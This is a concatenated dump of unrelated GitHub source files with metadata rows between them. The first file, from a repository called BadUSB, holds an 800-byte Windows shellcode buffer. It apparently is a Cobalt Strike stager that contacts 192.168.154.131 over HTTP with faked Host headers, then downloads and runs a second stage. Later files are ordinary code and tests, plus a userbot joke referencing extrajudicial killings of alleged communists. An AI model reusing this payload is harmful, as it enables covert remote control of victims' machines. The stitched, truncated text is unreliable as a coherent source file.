11f55ac48357acb737ab1204f671cbfe3dfa45b1
|
[
"BSD-3-Clause"
] | 145
|
2019-10-21T12:07:24.000Z
|
2022-03-21T23:20:57.000Z
|
CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.py
|
beidouhz/BadUSB
|
11f55ac48357acb737ab1204f671cbfe3dfa45b1
|
[
"BSD-3-Clause"
] | 1
|
2020-11-04T03:13:35.000Z
|
2021-02-08T16:44:34.000Z
|
CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.py
|
beidouhz/BadUSB
|
11f55ac48357acb737ab1204f671cbfe3dfa45b1
|
[
"BSD-3-Clause"
] | 33
|
2019-08-26T23:29:54.000Z
|
2022-02-27T09:43:43.000Z
|
# length: 800 bytes
buf = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x24\x05\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x60\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x66\x77\x31\x4e\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x29\x0d\x0a\x00\x62\x61\x69\x64\
x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x34\x2e\x31\x33\x31\x00\x00\x00\x00\x00"
| 1,076.333333
| 3,208
| 0.748529
| 804
| 3,229
| 3.006219
| 0.185323
| 0.074472
| 0.111709
| 0.14398
| 0.405875
| 0.356227
| 0.356227
| 0.356227
| 0.356227
| 0.356227
| 0
| 0.394786
| 0.002168
| 3,229
| 2
| 3,209
| 1,614.5
| 0.355369
| 0.005265
| 0
| 0
| 0
| 1
| 0.996885
| 0.996885
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
9513df2531ca00bf32c9f072836e3022745872ad
| 214
|
py
|
Python
|
src/xhorizon/tortoise/__init__.py
|
xh-diagrams/xhorizon
|
20b3f2f0f621ca2a31c9f6a1d5fcd06692a700ce
|
[
"MIT"
] | null | null | null |
src/xhorizon/tortoise/__init__.py
|
xh-diagrams/xhorizon
|
20b3f2f0f621ca2a31c9f6a1d5fcd06692a700ce
|
[
"MIT"
] | null | null | null |
src/xhorizon/tortoise/__init__.py
|
xh-diagrams/xhorizon
|
20b3f2f0f621ca2a31c9f6a1d5fcd06692a700ce
|
[
"MIT"
] | null | null | null |
from xhorizon.tortoise import math_util
from xhorizon.tortoise import metfunc_class
from xhorizon.tortoise import metfunc_factory
from xhorizon.tortoise import metfunc_tests
from xhorizon.tortoise import tortoise
| 30.571429
| 45
| 0.878505
| 29
| 214
| 6.344828
| 0.344828
| 0.326087
| 0.543478
| 0.706522
| 0.538043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.098131
| 214
| 6
| 46
| 35.666667
| 0.953368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
1f0149c05f64705d7cb6983695b2ccb56271eac7
| 67
|
py
|
Python
|
utils/embed.py
|
k-anson/clash_watcher
|
fa8aba99719e8b6088a73ce67cc851a2f6908b73
|
[
"MIT"
] | 1
|
2020-11-29T17:18:39.000Z
|
2020-11-29T17:18:39.000Z
|
utils/embed.py
|
k-anson/clash_watcher
|
fa8aba99719e8b6088a73ce67cc851a2f6908b73
|
[
"MIT"
] | null | null | null |
utils/embed.py
|
k-anson/clash_watcher
|
fa8aba99719e8b6088a73ce67cc851a2f6908b73
|
[
"MIT"
] | null | null | null |
from discord import Embed
def analyze_war_embed() -> Embed:
    """Build the Discord embed summarising a clan war.

    NOTE(review): currently a stub — the bare ``pass`` returns None, not an
    ``Embed`` as the annotation claims; implement or adjust the annotation.
    """
    pass
| 16.75
| 33
| 0.761194
| 10
| 67
| 4.9
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.164179
| 67
| 4
| 34
| 16.75
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
1f6d5576f704b06b83f7ca0c53c0e1100f1bb1e8
| 6,456
|
py
|
Python
|
tests/test_csp_extract.py
|
crataegustess/csp-tool
|
7d998abf22eb8823d59b4ee2446de334ff396a9c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_csp_extract.py
|
crataegustess/csp-tool
|
7d998abf22eb8823d59b4ee2446de334ff396a9c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_csp_extract.py
|
crataegustess/csp-tool
|
7d998abf22eb8823d59b4ee2446de334ff396a9c
|
[
"Apache-2.0"
] | 2
|
2020-06-19T12:39:56.000Z
|
2021-04-10T23:43:30.000Z
|
import pytest
from csp_tool.csp_extractor import extract_csp_part_from_java_like_entry, extract_full_csp, decode_base64_entry
def test_can_decode_base64_entry():
    """decode_base64_entry recovers the plain CSP from its base64 form."""
    expected_plain = "default-src 'self' 'unsafe-inline' 'unsafe-eval' www.googletagmanager.com www.google-analytics.com tagmanager.google.com fonts.googleapis.com ssl.gstatic.com www.gstatic.com fonts.gstatic.com fonts.googleapis.com data:;"
    encoded = 'ZGVmYXVsdC1zcmMgJ3NlbGYnICd1bnNhZmUtaW5saW5lJyAndW5zYWZlLWV2YWwnIHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbSB3d3cuZ29vZ2xlLWFuYWx5dGljcy5jb20gdGFnbWFuYWdlci5nb29nbGUuY29tIGZvbnRzLmdvb2dsZWFwaXMuY29tIHNzbC5nc3RhdGljLmNvbSB3d3cuZ3N0YXRpYy5jb20gZm9udHMuZ3N0YXRpYy5jb20gZm9udHMuZ29vZ2xlYXBpcy5jb20gZGF0YTo7'
    assert decode_base64_entry(encoded) == expected_plain
def test_can_extract_csp_pair_from_java_like_string():
    """The CSP value is pulled out of a JVM-style -D option string."""
    jvm_options = "-J-Dapplication.router=testOnlyDoNotUseInAppConf.Routes -Dhttp.port=9284 -Dplay.filters.headers.contentSecurityPolicy='www.google-analytics.com'"
    assert extract_csp_part_from_java_like_entry(jvm_options) == "www.google-analytics.com"
def test_highlights_base64_csp_strings():
    """A base64 CSP in a ``...base64 = "..."`` config entry is surfaced with
    the 'base64: ' prefix instead of being decoded."""
    base_64_csp = 'play.filters.headers.contentSecurityPolicy.base64 = "ZGVmYXVsdC1zcmMgJ3NlbGYnICd1bnNhZmUtaW5saW5lJyAndW5zYWZlLWV2YWwnIHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbSB3d3cuZ29vZ2xlLWFuYWx5dGljcy5jb20gdGFnbWFuYWdlci5nb29nbGUuY29tIGZvbnRzLmdvb2dsZWFwaXMuY29tIHNzbC5nc3RhdGljLmNvbSB3d3cuZ3N0YXRpYy5jb20gZm9udHMuZ3N0YXRpYy5jb20gZm9udHMuZ29vZ2xlYXBpcy5jb20gZGF0YTo7"'
    expected_return = 'base64: ' + 'ZGVmYXVsdC1zcmMgJ3NlbGYnICd1bnNhZmUtaW5saW5lJyAndW5zYWZlLWV2YWwnIHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbSB3d3cuZ29vZ2xlLWFuYWx5dGljcy5jb20gdGFnbWFuYWdlci5nb29nbGUuY29tIGZvbnRzLmdvb2dsZWFwaXMuY29tIHNzbC5nc3RhdGljLmNvbSB3d3cuZ3N0YXRpYy5jb20gZm9udHMuZ3N0YXRpYy5jb20gZm9udHMuZ29vZ2xlYXBpcy5jb20gZGF0YTo7'
    assert expected_return == extract_full_csp(base_64_csp)
def test_highlights_base64_csp_strings_without_prefix():
    """Same as above but without the ``.base64 = "..."`` key/quotes: a bare
    base64 token after the config key is still flagged, not decoded."""
    base_64_csp = 'contentSecurityPolicy ZGVmYXVsdC1zcmMgJ3NlbGYnICd1bnNhZmUtaW5saW5lJyAndW5zYWZlLWV2YWwnIHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbSB3d3cuZ29vZ2xlLWFuYWx5dGljcy5jb20gdGFnbWFuYWdlci5nb29nbGUuY29tIGZvbnRzLmdvb2dsZWFwaXMuY29tIHNzbC5nc3RhdGljLmNvbSB3d3cuZ3N0YXRpYy5jb20gZm9udHMuZ3N0YXRpYy5jb20gZm9udHMuZ29vZ2xlYXBpcy5jb20gZGF0YTo7'
    expected_return = 'base64: ' + 'ZGVmYXVsdC1zcmMgJ3NlbGYnICd1bnNhZmUtaW5saW5lJyAndW5zYWZlLWV2YWwnIHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbSB3d3cuZ29vZ2xlLWFuYWx5dGljcy5jb20gdGFnbWFuYWdlci5nb29nbGUuY29tIGZvbnRzLmdvb2dsZWFwaXMuY29tIHNzbC5nc3RhdGljLmNvbSB3d3cuZ3N0YXRpYy5jb20gZm9udHMuZ3N0YXRpYy5jb20gZm9udHMuZ29vZ2xlYXBpcy5jb20gZGF0YTo7'
    assert expected_return == extract_full_csp(base_64_csp)
@pytest.mark.parametrize(
"entry,expected_csp",
[
('something unexpected', None),
("-J-Dapplication.router=testOnlyDoNotUseInAppConf.Routes -Dhttp.port=9284 -Dplay.filters.headers.contentSecurityPolicy='www.google-analytics.com'", "www.google-analytics.com"),
(' "-Dplay.filters.headers.contentSecurityPolicy='+"'www.google-analytics.com'","www.google-analytics.com"),
("contentSecurity default-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.googletagmanager.com https://www.google-analytics.com https://tagmanager.google.com https://fonts.googleapis.com https://ssl.gstatic.com https://www.gstatic.com https://fonts.gstatic.com https://fonts.googleapis.com data:;", "default-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.googletagmanager.com https://www.google-analytics.com https://tagmanager.google.com https://fonts.googleapis.com https://ssl.gstatic.com https://www.gstatic.com https://fonts.gstatic.com https://fonts.googleapis.com data:;"),
("filters.headers.security.contentSecurity default-src 'self' 'unsafe-inline' 'unsafe-eval' webchat.tax.service.gov.uk *.analytics-egain.com https://www.googletagmanager.com https://www.google-analytics.com https://tagmanager.google.com https://fonts.googleapis.com https://ssl.gstatic.com https://www.gstatic.com https://fonts.gstatic.com https://fonts.googleapis.com data:","default-src 'self' 'unsafe-inline' 'unsafe-eval' webchat.tax.service.gov.uk *.analytics-egain.com https://www.googletagmanager.com https://www.google-analytics.com https://tagmanager.google.com https://fonts.googleapis.com https://ssl.gstatic.com https://www.gstatic.com https://fonts.gstatic.com https://fonts.googleapis.com data:"),
("#filters.headers.contentSecurity default-src 'self' 'unsafe-inline' localhost:9000 localhost:9032 localhost:9250 stats.g.doubleclick.net www.google-analytics.com object-src 'none'","default-src 'self' 'unsafe-inline' localhost:9000 localhost:9032 localhost:9250 stats.g.doubleclick.net www.google-analytics.com object-src 'none'"),
("play.filters.headers.contentSecurity default-src 'self' 'unsafe-inline' www.google-analytics.com app.optimizely.com cdn.optimizely.com *.optimizely.com optimizely.s3.amazonaws.com data:", "default-src 'self' 'unsafe-inline' www.google-analytics.com app.optimizely.com cdn.optimizely.com *.optimizely.com optimizely.s3.amazonaws.com data:"),
('play.filters.headers.contentSecurityPolicy: "default-src"', 'default-src'),
('play.filters.headers.contentSecurityPolicy: "ZGVmYXVsdC1zcmMgJ3NlbGYnICd1bnNhZmUtaW5saW5lJyAndW5zYWZlLWV2YWwn"', 'base64: ' + 'ZGVmYXVsdC1zcmMgJ3NlbGYnICd1bnNhZmUtaW5saW5lJyAndW5zYWZlLWV2YWwn'),
("headers.contentSecurityPolicy= \"default-src 'self' 'unsafe-inline' analytics.analytics-egain.com localhost:9032 localhost:9310 *.optimizely.com optimizely.s3.amazonaws.com www.google-analytics.com www.googletagmanager.com fonts.googleapis.com tagmanager.google.com ssl.gstatic.com www.gstatic.com fonts.gstatic.com data:\"", "default-src 'self' 'unsafe-inline' analytics.analytics-egain.com localhost:9032 localhost:9310 *.optimizely.com optimizely.s3.amazonaws.com www.google-analytics.com www.googletagmanager.com fonts.googleapis.com tagmanager.google.com ssl.gstatic.com www.gstatic.com fonts.gstatic.com data:"),
("//play.filters.headers.contentSecurityPolicy = \"default-src 'self' localhost:9000 localhost:9032 localhost:9250 www.google-analytics.com\"", "default-src 'self' localhost:9000 localhost:9032 localhost:9250 www.google-analytics.com"),
],
)
def test_extract_csp_from_entry(entry, expected_csp):
    """Parametrized: extract_full_csp pulls the CSP (or None) out of *entry*."""
    csp = extract_full_csp(entry)
    assert expected_csp == csp
| 124.153846
| 719
| 0.825279
| 647
| 6,456
| 8.11592
| 0.14374
| 0.045706
| 0.06513
| 0.075986
| 0.791278
| 0.781375
| 0.768806
| 0.750143
| 0.719292
| 0.719292
| 0
| 0.065636
| 0.067844
| 6,456
| 52
| 720
| 124.153846
| 0.806913
| 0
| 0
| 0.105263
| 0
| 0.342105
| 0.761809
| 0.438904
| 0.052632
| 0
| 0
| 0
| 0.131579
| 1
| 0.131579
| false
| 0
| 0.052632
| 0
| 0.184211
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
1f7db653aecb6076868eb63b9ed5143aa1c631b9
| 302
|
py
|
Python
|
python/testData/inspections/PySetFunctionToLiteralInspection/test.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/inspections/PySetFunctionToLiteralInspection/test.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/inspections/PySetFunctionToLiteralInspection/test.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
my_set = set()
my_set = <warning descr="Function call can be replaced with set literal">set([1,2,3])</warning>
my_set = <warning descr="Function call can be replaced with set literal">set((1,2,3))</warning>
my_set = set(var)
def set(fake=None):
pass
my_fake_set = set()
my_fake_set = set([1,2,3])
| 25.166667
| 95
| 0.695364
| 57
| 302
| 3.54386
| 0.333333
| 0.09901
| 0.074257
| 0.089109
| 0.707921
| 0.707921
| 0.707921
| 0.707921
| 0.707921
| 0.707921
| 0
| 0.034615
| 0.139073
| 302
| 11
| 96
| 27.454545
| 0.742308
| 0
| 0
| 0
| 0
| 0
| 0.304636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.125
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
2f54ed69e022e1f669b9a440fe5d8f24d05f272d
| 3,211
|
py
|
Python
|
accelbyte_py_sdk/api/gdpr/wrappers/__init__.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | null | null | null |
accelbyte_py_sdk/api/gdpr/wrappers/__init__.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | 1
|
2021-10-13T03:46:58.000Z
|
2021-10-13T03:46:58.000Z
|
accelbyte_py_sdk/api/gdpr/wrappers/__init__.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2021 AccelByte Inc. All Rights Reserved.
# This is licensed software from AccelByte Inc, for limitations
# and restrictions contact your company contract manager.
#
# Code generated. DO NOT EDIT!
# template file: justice_py_sdk_codegen/__main__.py
"""Auto-generated package that contains models used by the justice-gdpr-service."""
__version__ = "1.14.6"
__author__ = "AccelByte"
__email__ = "dev@accelbyte.net"
# pylint: disable=line-too-long
from ._data_deletion import admin_cancel_user_account_deletion_request
from ._data_deletion import admin_cancel_user_account_deletion_request_async
from ._data_deletion import admin_get_list_deletion_data_request
from ._data_deletion import admin_get_list_deletion_data_request_async
from ._data_deletion import admin_get_user_account_deletion_request
from ._data_deletion import admin_get_user_account_deletion_request_async
from ._data_deletion import admin_submit_user_account_deletion_request
from ._data_deletion import admin_submit_user_account_deletion_request_async
from ._data_deletion import public_cancel_user_account_deletion_request
from ._data_deletion import public_cancel_user_account_deletion_request_async
from ._data_deletion import public_get_user_account_deletion_status
from ._data_deletion import public_get_user_account_deletion_status_async
from ._data_deletion import public_submit_user_account_deletion_request
from ._data_deletion import public_submit_user_account_deletion_request_async
from ._data_retrieval import admin_cancel_user_personal_data_request
from ._data_retrieval import admin_cancel_user_personal_data_request_async
from ._data_retrieval import admin_generate_personal_data_url
from ._data_retrieval import admin_generate_personal_data_url_async
from ._data_retrieval import admin_get_list_personal_data_request
from ._data_retrieval import admin_get_list_personal_data_request_async
from ._data_retrieval import admin_get_user_personal_data_requests
from ._data_retrieval import admin_get_user_personal_data_requests_async
from ._data_retrieval import admin_request_data_retrieval
from ._data_retrieval import admin_request_data_retrieval_async
from ._data_retrieval import delete_admin_email_configuration
from ._data_retrieval import delete_admin_email_configuration_async
from ._data_retrieval import get_admin_email_configuration
from ._data_retrieval import get_admin_email_configuration_async
from ._data_retrieval import public_cancel_user_personal_data_request
from ._data_retrieval import public_cancel_user_personal_data_request_async
from ._data_retrieval import public_generate_personal_data_url
from ._data_retrieval import public_generate_personal_data_url_async
from ._data_retrieval import public_get_user_personal_data_requests
from ._data_retrieval import public_get_user_personal_data_requests_async
from ._data_retrieval import public_request_data_retrieval
from ._data_retrieval import public_request_data_retrieval_async
from ._data_retrieval import save_admin_email_configuration
from ._data_retrieval import save_admin_email_configuration_async
from ._data_retrieval import update_admin_email_configuration
from ._data_retrieval import update_admin_email_configuration_async
| 55.362069
| 83
| 0.903145
| 456
| 3,211
| 5.721491
| 0.175439
| 0.122652
| 0.169414
| 0.229207
| 0.868915
| 0.868915
| 0.866999
| 0.866999
| 0.641242
| 0.574166
| 0
| 0.00268
| 0.070383
| 3,211
| 57
| 84
| 56.333333
| 0.871357
| 0.112426
| 0
| 0
| 1
| 0
| 0.011276
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.930233
| 0
| 0.930233
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
2f5f898701e4783163c91a9c18c0442de734dabd
| 9,748
|
py
|
Python
|
userbot/modules/petrus.py
|
ichn666shit/Yama
|
8dc991aa01f0810341520133c27bea436537656b
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/petrus.py
|
ichn666shit/Yama
|
8dc991aa01f0810341520133c27bea436537656b
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/petrus.py
|
ichn666shit/Yama
|
8dc991aa01f0810341520133c27bea436537656b
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
import asyncio
from time import sleep

from userbot import CMD_HELP
from userbot.events import register
@register(outgoing=True, pattern=r"^\.petrus(?: |$)(.*)")
async def typewriter(typew):
    """Replace the outgoing `.petrus` message with a joke 0-100% progress bar.

    Fixes over the original:
    - the 100 hand-unrolled progress frames are generated by a loop;
    - blocking time.sleep() inside a coroutine stalled the whole event loop,
      replaced with `await asyncio.sleep()`;
    - the original repeated the 99% glyph ("...▌") at 100% by copy-paste;
      the loop renders the correct "▊" partial block there.

    :param typew: the Telethon message event for the outgoing command.
    :return: None (edits the message in place).
    """
    typew.pattern_match.group(1)  # command argument is read but unused (kept for parity)
    await typew.edit("`Operasi petrus dilaksanakeun!1!1 ツ`")
    await asyncio.sleep(2)
    await typew.edit("`Mencari antek-antek PKI...`")
    await asyncio.sleep(1)
    await typew.edit("`KETEMU! GASKEUN!1!1`")
    await asyncio.sleep(1)
    await typew.edit("0%")
    # The bar cycles through five partial-block glyphs and gains one full
    # block every 6 percent, matching the original frame sequence.
    partials = ("", "▎", "▍", "▌", "▊", "▉")
    for percent in range(1, 101):
        bar = "█" * (percent // 6) + partials[percent % 6]
        await typew.edit(f"{percent}% {bar}")
        await asyncio.sleep(0.03)
    await asyncio.sleep(1)
    await typew.edit("`SEE U ANTEK P K I`")
# Register the `.petrus` command in the bot's global help index.
# The backslash at the end of the first string line is a line continuation
# inside the literal, so the help text is "`.petrus`\nUsage: canda petrus.".
CMD_HELP.update(
    {
        "petrus": "`.petrus`\
\nUsage: canda petrus."
    }
)
| 29.90184
| 60
| 0.487895
| 1,277
| 9,748
| 4.414252
| 0.111981
| 0.186269
| 0.260777
| 0.301579
| 0.793507
| 0.778783
| 0.778783
| 0.778783
| 0.778783
| 0.778783
| 0
| 0.057059
| 0.26826
| 9,748
| 325
| 61
| 29.993846
| 0.609281
| 0
| 0
| 0.634375
| 0
| 0
| 0.145261
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.009375
| 0
| 0.009375
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2f7667e4813d9f2fb9d9ea413b2ea490d288a469
| 179
|
py
|
Python
|
src/h_vialib/secure/__init__.py
|
hypothesis/h-vialib
|
7b4e75c24e16363a11fe446b0a9f24c54becc70b
|
[
"BSD-2-Clause"
] | null | null | null |
src/h_vialib/secure/__init__.py
|
hypothesis/h-vialib
|
7b4e75c24e16363a11fe446b0a9f24c54becc70b
|
[
"BSD-2-Clause"
] | 9
|
2021-02-05T16:23:17.000Z
|
2021-04-16T13:47:15.000Z
|
src/h_vialib/secure/__init__.py
|
hypothesis/h-vialib
|
7b4e75c24e16363a11fe446b0a9f24c54becc70b
|
[
"BSD-2-Clause"
] | null | null | null |
"""Security helpers."""
from h_vialib.secure.expiry import quantized_expiry
from h_vialib.secure.token import SecureToken
from h_vialib.secure.url import SecureURL, ViaSecureURL
| 29.833333
| 55
| 0.832402
| 25
| 179
| 5.8
| 0.56
| 0.103448
| 0.227586
| 0.351724
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089385
| 179
| 5
| 56
| 35.8
| 0.889571
| 0.094972
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
85efe0f5b690a0a0557b8e1413fbeb700f2b6c4d
| 37
|
py
|
Python
|
pythonteste/Aula11.py
|
RodrigoPasini/PYTHON
|
e114390091fedb03bf25a56a671da6186d6bfcae
|
[
"MIT"
] | null | null | null |
pythonteste/Aula11.py
|
RodrigoPasini/PYTHON
|
e114390091fedb03bf25a56a671da6186d6bfcae
|
